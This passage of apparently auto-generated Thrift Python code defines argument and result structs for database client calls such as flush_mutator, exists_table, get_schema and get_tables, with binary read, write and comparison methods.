      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class flush_mutator_args:
  """
  Thrift argument struct for flush_mutator.

  Attributes:
   - mutator: mutator handle (field 1, I64)
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'mutator', None, None, ), # 1
  )

  def __init__(self, mutator=None,):
    self.mutator = mutator

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.mutator = iprot.readI64()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('flush_mutator_args')
    if self.mutator is not None:
      oprot.writeFieldBegin('mutator', TType.I64, 1)
      oprot.writeI64(self.mutator)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class flush_mutator_result:
  """
  Thrift result struct for flush_mutator.

  Attributes:
   - e: ClientException raised by the server, if any (field 1, STRUCT)
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, e=None,):
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('flush_mutator_result')
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class exists_namespace_args:
  """
  Thrift argument struct for exists_namespace.

  Attributes:
   - ns: namespace name (field 1, STRING)
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'ns', None, None, ), # 1
  )

  def __init__(self, ns=None,):
    self.ns = ns

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.ns = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('exists_namespace_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.STRING, 1)
      oprot.writeString(self.ns)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class exists_namespace_result:
  """
  Thrift result struct for exists_namespace.

  Attributes:
   - success: return value (field 0, BOOL)
   - e: ClientException raised by the server, if any (field 1, STRUCT)
  """

  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('exists_namespace_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class exists_table_args:
  """
  Thrift argument struct for exists_table.

  Attributes:
   - ns: namespace handle (field 1, I64)
   - name: table name (field 2, STRING)
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'name', None, None, ), # 2
  )

  def __init__(self, ns=None, name=None,):
    self.ns = ns
    self.name = name

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.name = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('exists_table_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.name is not None:
      oprot.writeFieldBegin('name', TType.STRING, 2)
      oprot.writeString(self.name)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class exists_table_result:
  """
  Thrift result struct for exists_table.

  Attributes:
   - success: return value (field 0, BOOL)
   - e: ClientException raised by the server, if any (field 1, STRUCT)
  """

  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('exists_table_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_table_id_args:
  """
  Thrift argument struct for get_table_id.

  Attributes:
   - ns: namespace handle (field 1, I64)
   - table_name: table name (field 2, STRING)
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
  )

  def __init__(self, ns=None, table_name=None,):
    self.ns = ns
    self.table_name = table_name

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_table_id_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name is not None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_table_id_result:
  """
  Thrift result struct for get_table_id.

  Attributes:
   - success: return value (field 0, STRING)
   - e: ClientException raised by the server, if any (field 1, STRUCT)
  """

  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_table_id_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_schema_str_args:
  """
  Thrift argument struct for get_schema_str.

  Attributes:
   - ns: namespace handle (field 1, I64)
   - table_name: table name (field 2, STRING)
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
  )

  def __init__(self, ns=None, table_name=None,):
    self.ns = ns
    self.table_name = table_name

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_schema_str_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name is not None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_schema_str_result:
  """
  Thrift result struct for get_schema_str.

  Attributes:
   - success: return value (field 0, STRING)
   - e: ClientException raised by the server, if any (field 1, STRUCT)
  """

  thrift_spec = (
    (0, TType.STRING, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRING:
          self.success = iprot.readString()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_schema_str_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRING, 0)
      oprot.writeString(self.success)
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_schema_args:
  """
  Thrift argument struct for get_schema.

  Attributes:
   - ns: namespace handle (field 1, I64)
   - table_name: table name (field 2, STRING)
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
    (2, TType.STRING, 'table_name', None, None, ), # 2
  )

  def __init__(self, ns=None, table_name=None,):
    self.ns = ns
    self.table_name = table_name

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.table_name = iprot.readString()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_schema_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    if self.table_name is not None:
      oprot.writeFieldBegin('table_name', TType.STRING, 2)
      oprot.writeString(self.table_name)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_schema_result:
  """
  Thrift result struct for get_schema.

  Attributes:
   - success: return value (field 0, STRUCT Schema)
   - e: ClientException raised by the server, if any (field 1, STRUCT)
  """

  thrift_spec = (
    (0, TType.STRUCT, 'success', (Schema, Schema.thrift_spec), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = Schema()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_schema_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_tables_args:
  """
  Thrift argument struct for get_tables.

  Attributes:
   - ns: namespace handle (field 1, I64)
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'ns', None, None, ), # 1
  )

  def __init__(self, ns=None,):
    self.ns = ns

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I64:
          self.ns = iprot.readI64()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_tables_args')
    if self.ns is not None:
      oprot.writeFieldBegin('ns', TType.I64, 1)
      oprot.writeI64(self.ns)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # .items() (not Py2-only .iteritems()) keeps this working on Python 3.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.items()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_tables_result:
  """
  Thrift result struct for get_tables.

  Attributes:
   - success: return value, list of table names (field 0, LIST<STRING>)
   - e: ClientException raised by the server, if any (field 1, STRUCT)
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
    (1, TType.STRUCT, 'e', (ClientException, ClientException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated binary decode when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown fields are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype189, _size186) = iprot.readListBegin()
          # range (not Py2-only xrange) keeps this working on Python 3.
          for _i190 in range(_size186):
            _elem191 = iprot.readString()
            self.success.append(_elem191)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = ClientException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: C-accelerated binary encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_tables_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRING, len(self.success))
      for iter192 in self.success:
        oprot.writeString(iter192)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
